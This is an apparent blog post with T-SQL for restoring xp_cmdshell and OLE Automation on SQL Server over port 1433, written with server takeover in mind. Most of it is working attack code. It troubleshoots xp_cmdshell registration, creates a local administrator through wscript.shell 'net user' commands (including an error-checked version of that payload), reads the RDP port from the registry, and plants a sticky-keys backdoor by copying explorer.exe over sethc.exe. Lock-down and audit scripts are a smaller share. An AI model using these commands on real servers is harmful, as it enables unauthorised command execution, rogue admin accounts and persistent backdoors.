The complete set of SQL statement repairs for 1433 (restoring xp_cmdshell on SQL Server)

Copyright notice: this is an original article by the blogger; reproduction without the blogger's permission is not allowed. https://blog.csdn.net/david_520042/article/details/5907533




  Restore xp_cmdshell directly with SQL commands, without going through Query Analyzer

  Restore commands (dbcc addextendedproc is the undocumented command that sp_addextendedproc itself wraps, so it still works when sp_addextendedproc has been dropped):

  dbcc addextendedproc ("sp_oacreate","odsole70.dll")

  dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

  Fix for "Could not find stored procedure 'master..xp_cmdshell'". Restore commands (xplog70.dll is the xp_cmdshell DLL on SQL Server 2000, xpsql70.dll the one on SQL Server 7.0; only the one matching the instance will load):

  EXEC sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'

  sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

  Restore the odsole70.dll procedures (OLE Automation):

  exec sp_addextendedproc sp_OAMethod, 'odsole70.dll'

  exec sp_addextendedproc sp_OACreate, 'odsole70.dll'

  If you get "SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell'" (SQL Server 2005 and later, where xp_cmdshell is registered but switched off by default)

  Solution: run the following statements (requires a sysadmin login or ALTER SETTINGS permission)

  -- To allow advanced options to be changed.
  EXEC sp_configure 'show advanced options', 1
  GO
  -- To update the currently configured value for advanced options.
  RECONFIGURE
  GO
  -- To enable the feature.
  EXEC sp_configure 'xp_cmdshell', 1
  GO
  -- To update the currently configured value for this feature.
  RECONFIGURE
  GO

  SQL statement to register cmdshell

  EXEC sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'

  Check whether the extended stored procedure is registered

  SELECT COUNT(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell'

  A result of 1 means it is there.

  Restore xp_cmdshell (note the procedure is sp_addextendedproc, not addextendedproc)

  EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'; SELECT COUNT(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell'

  A result of 1 means it worked.

  Otherwise upload xplog70.dll and register it with its full path:

  EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'C:\WinNt\System32\xplog70.dll' [C:\WinNt\System32\xplog70.dll is the file path; on some servers SQL Server is not installed on C:, so check the real path with SQLTools]
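The check-then-restore steps above, as one T-SQL script that branches on the server version: on SQL Server 2000 it verifies the registration and the DLL on disk before re-registering, on 2005 and later it uses the sp_configure switch. This is an added example, not code from the original post; the Binn directory in @binn is an assumption and must be replaced with the instance's real path (the post suggests finding it with SQLTools).

```sql
-- Added example (not from the original post): check whether xp_cmdshell is
-- registered and usable, and restore it, on SQL Server 2000 or 2005+.
USE master
GO
DECLARE @binn NVARCHAR(260), @dll NVARCHAR(300), @ver NVARCHAR(30), @major INT, @exists INT
-- ASSUMPTION: Binn directory of the instance; a named instance uses MSSQL$NAME\Binn.
SET @binn = N'C:\Program Files\Microsoft SQL Server\MSSQL\Binn'
SET @dll  = @binn + N'\xplog70.dll'

-- ProductVersion looks like '8.00.2039' (2000) or '9.00.5000' (2005): take the major number.
SET @ver   = CAST(SERVERPROPERTY('ProductVersion') AS NVARCHAR(30))
SET @major = CAST(LEFT(@ver, CHARINDEX('.', @ver) - 1) AS INT)

IF @major >= 9
BEGIN
    -- 2005+: xp_cmdshell is always registered but disabled by default; flip the switch.
    EXEC sp_configure 'show advanced options', 1
    RECONFIGURE
    EXEC sp_configure 'xp_cmdshell', 1
    RECONFIGURE
END
ELSE
BEGIN
    -- 2000: the registration itself may have been dropped. Step 1: is it registered?
    SELECT @exists = COUNT(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell'
    IF @exists = 0
    BEGIN
        -- Step 2: is the DLL actually on disk? xp_fileexist's first column is 1 if so.
        CREATE TABLE #fe (FileExists INT, IsDirectory INT, ParentExists INT)
        INSERT #fe EXEC master.dbo.xp_fileexist @dll
        IF EXISTS (SELECT 1 FROM #fe WHERE FileExists = 1)
            EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', @dll   -- full path, as in the post
        ELSE
            PRINT N'xplog70.dll not found in ' + @binn + N': upload it first or fix @binn'
        DROP TABLE #fe
    END
END

-- Final check: is it registered now, and does it actually spawn a process?
IF OBJECT_ID('master..xp_cmdshell') IS NOT NULL
    EXEC master..xp_cmdshell 'ver'
ELSE
    PRINT N'xp_cmdshell is still missing'
```

The DLL-on-disk check is what separates "re-register it" from "upload it first": sp_addextendedproc succeeds even if the DLL is absent, and the load error (reason 126) only appears when xp_cmdshell is first called.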

  "Cannot load DLL xpsql70.dll or one of the DLLs it references. Reason 126 (The specified module could not be found.)" The DLL name that xp_cmdshell is registered against cannot be found from the SQL Server process (Binn directory or system path), so try the other DLL name (if a step reports that the procedure already exists, run exec sp_dropextendedproc 'xp_cmdshell' first):

  Step 1, run: EXEC sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'

  Step 2, run: sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

  "Cannot find function xp_cmdshell in library xpweb70.dll. Reason: 127 (The specified procedure could not be found.)" The DLL loaded, but it does not export xp_cmdshell: xp_cmdshell was registered against the wrong DLL (xpweb70.dll is the web-task DLL, not the one carrying xp_cmdshell).

  Recovery: after connecting in Query Analyzer,

  Step 1, run: exec sp_dropextendedproc 'xp_cmdshell'

  Step 2, run: exec sp_addextendedproc 'xp_cmdshell', 'xplog70.dll' (re-adding it against xpweb70.dll would reproduce the same error; the DLL that exports xp_cmdshell on SQL Server 2000 is xplog70.dll, as in the rest of this post)

  "Could not find stored procedure sp_addextendedproc". Recreate it in master; it is only a thin wrapper around dbcc addextendedproc:

  use master
  go
  create procedure sp_addextendedproc
  @functname nvarchar(517),   /* (owner.)name of function to call */
  @dllname varchar(255)       /* name of DLL containing function */
  as
  set implicit_transactions off
  if @@trancount > 0
  begin
  raiserror(15002,-1,-1,'sp_addextendedproc')
  return (1)
  end
  dbcc addextendedproc( @functname, @dllname)
  return (0) -- sp_addextendedproc
  go

  [The code found online is the same but reads "create procedure sp_addextendedproc --- 1996/08/30 20:13" on the first line. I found that it did not work; once I removed the timestamp 1996/08/30 20:13 it worked.] The reason is that the online version gets pasted as a single line: everything after "---" is then a comment, so the parameter list and body are swallowed. With the procedure split across lines as above, the timestamp comment would be harmless.

  Creating a user without xplog70.dll (OLE Automation via wscript.shell instead of xp_cmdshell)

  Run as two separate batches; declaring @cmd twice in one batch is an error. Replace <username> and <password>:

  declare @cmd INT
  exec sp_oacreate 'wscript.shell', @cmd output
  exec sp_oamethod @cmd, 'run', null, 'net user <username> <password> /add', '0', 'true'
  go

  declare @cmd INT
  exec sp_oacreate 'wscript.shell', @cmd output
  exec sp_oamethod @cmd, 'run', null, 'net localgroup administrators <username> /add', '0', 'true'
  go
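The two wscript.shell batches above fire sp_oamethod blind, so a failure (odsole70.dll not registered, 'Ole Automation Procedures' switched off on 2005+, or net.exe refusing the request) is invisible. The following added example, which is not code from the original post, runs the same command with HRESULT checks through sp_OAGetErrorInfo and captures the process exit code that Run returns when asked to wait; <username> and <password> are placeholders.

```sql
-- Added example (not from the original post): OLE Automation command execution
-- with error reporting instead of a blind sp_oamethod call.
DECLARE @shell INT, @hr INT, @rc INT, @src VARCHAR(255), @desc VARCHAR(255), @cmd VARCHAR(500)
-- ASSUMPTION: placeholders to be replaced; cmd /c is needed for the && chaining.
SET @cmd = 'cmd /c net user <username> <password> /add && net localgroup administrators <username> /add'

EXEC @hr = sp_OACreate 'WScript.Shell', @shell OUTPUT
IF @hr <> 0
BEGIN
    -- Typical causes: sp_OACreate not registered (re-add it from odsole70.dll as above)
    -- or, on 2005+, 'Ole Automation Procedures' disabled in sp_configure.
    EXEC sp_OAGetErrorInfo NULL, @src OUTPUT, @desc OUTPUT
    RAISERROR('sp_OACreate failed, hr=0x%x: %s %s', 16, 1, @hr, @src, @desc)
    RETURN
END

-- Run(command, windowStyle, waitOnReturn): with waitOnReturn = 1 the method's
-- return value (third argument, OUTPUT) is the exit code of the process.
EXEC @hr = sp_OAMethod @shell, 'Run', @rc OUTPUT, @cmd, 0, 1
IF @hr <> 0
BEGIN
    EXEC sp_OAGetErrorInfo @shell, @src OUTPUT, @desc OUTPUT
    RAISERROR('Run failed, hr=0x%x: %s %s', 16, 1, @hr, @src, @desc)
END
ELSE IF @rc <> 0
    -- net.exe exits non-zero when the account exists, the password violates
    -- policy, or the calling account lacks the right: the command did not succeed.
    RAISERROR('command exited with code %d', 16, 1, @rc)
ELSE
    PRINT 'command completed with exit code 0'

EXEC sp_OADestroy @shell
```

The exit code matters more than the HRESULT in practice: sp_OAMethod returns 0 as soon as Run has started the process, so without waitOnReturn and the OUTPUT return value a failed net user looks exactly like a successful one.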

  If you don't want others to take the server, remove xp_cmdshell (and with it sa's ability to run commands through it):

  use master

  sp_dropextendedproc 'xp_cmdshell'

  Note that this only deregisters the procedure; it is not a permission change. Any sysadmin login, sa included, can put it back with one line (that is exactly what the commands in this post do), and sp_OACreate still offers the wscript.shell route shown above. On 2005 and later the supported control is EXEC sp_configure 'xp_cmdshell', 0.

  Restore it for sa:

  sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
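Because dropping xp_cmdshell on its own leaves the OLE Automation path open and is reversible by any sysadmin, a lock-down has to cover both procedures the post uses and then verify the result. The following added example, which is not part of the original post, audits the registered extended procedures with sp_helpextendedproc and then disables both paths in the way each version supports.

```sql
-- Added example (not from the original post): audit and disable the two
-- command-execution paths this page relies on, xp_cmdshell and sp_OA*.
USE master
GO
DECLARE @ver NVARCHAR(30), @major INT
SET @ver   = CAST(SERVERPROPERTY('ProductVersion') AS NVARCHAR(30))
SET @major = CAST(LEFT(@ver, CHARINDEX('.', @ver) - 1) AS INT)

-- 1. Audit: every registered extended procedure and the DLL it points at.
--    A DLL outside the Binn directory, or a name you did not register, is suspect.
EXEC sp_helpextendedproc

IF @major >= 9
BEGIN
    -- 2. 2005+: turn both features off through the supported switches.
    EXEC sp_configure 'show advanced options', 1
    RECONFIGURE
    EXEC sp_configure 'xp_cmdshell', 0
    EXEC sp_configure 'Ole Automation Procedures', 0
    RECONFIGURE
    -- 3. Verify: run_value must be 0 for both.
    EXEC sp_configure 'xp_cmdshell'
    EXEC sp_configure 'Ole Automation Procedures'
END
ELSE
BEGIN
    -- 2. 2000: there is no switch, only deregistration, so drop xp_cmdshell
    --    and the whole sp_OA* family (any one of them re-added restores the path).
    EXEC sp_dropextendedproc 'xp_cmdshell'
    EXEC sp_dropextendedproc 'sp_OACreate'
    EXEC sp_dropextendedproc 'sp_OAMethod'
    EXEC sp_dropextendedproc 'sp_OAGetProperty'
    EXEC sp_dropextendedproc 'sp_OASetProperty'
    EXEC sp_dropextendedproc 'sp_OAGetErrorInfo'
    EXEC sp_dropextendedproc 'sp_OADestroy'
    -- 3. Verify: this must return no rows.
    SELECT name FROM master.dbo.sysobjects
    WHERE xtype = 'X' AND (name = 'xp_cmdshell' OR name LIKE 'sp_OA%')
END
```

Either branch is still one sp_addextendedproc (or sp_configure) away from being undone by a sysadmin login, so the lasting fix is to take sysadmin away from the application login that reaches port 1433 and to change the sa password; the script above closes the doors, it does not remove the key.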

  If you get "Error Message: xpsql.cpp: Error 5 from CreateProcess (line 737)": error 5 is the Win32 code for access denied, i.e. cmd.exe was found but the account xp_cmdshell runs under (the SQL Server service account, or the proxy account for non-sysadmin callers) is not allowed to execute it. First check whether cmd.exe still exists on the C: drive and whether odsole70.dll exists in the SQL Server install directory; if both are there, there is still hope (the OLE Automation route above). In that case use SQL commands to read the Terminal Services port and whether it is open:

  exec master..xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp', 'PortNumber'

  ① A shift (sticky keys) backdoor can be set up with two statements. Pressing Shift five times at the RDP logon screen launches sethc.exe with SYSTEM privileges, which is what makes the replaced file a backdoor; the second copy goes into dllcache so Windows File Protection does not restore the original sethc.exe from there.

  -- this statement copies explorer.exe over sethc.exe
  declare @o int
  exec sp_oacreate 'scripting.filesystemobject', @o out
  exec sp_oamethod @o, 'copyfile', null, 'c:\windows\explorer.exe', 'c:\windows\system32\sethc.exe';

  -- this statement copies the new sethc.exe into the dllcache directory
  declare @oo int
  exec sp_oacreate 'scripting.filesystemobject', @oo out
  exec sp_oamethod @oo, 'copyfile', null, 'c:\windows\system32\sethc.exe', 'c:\windows\system32\dllcache\sethc.exe';
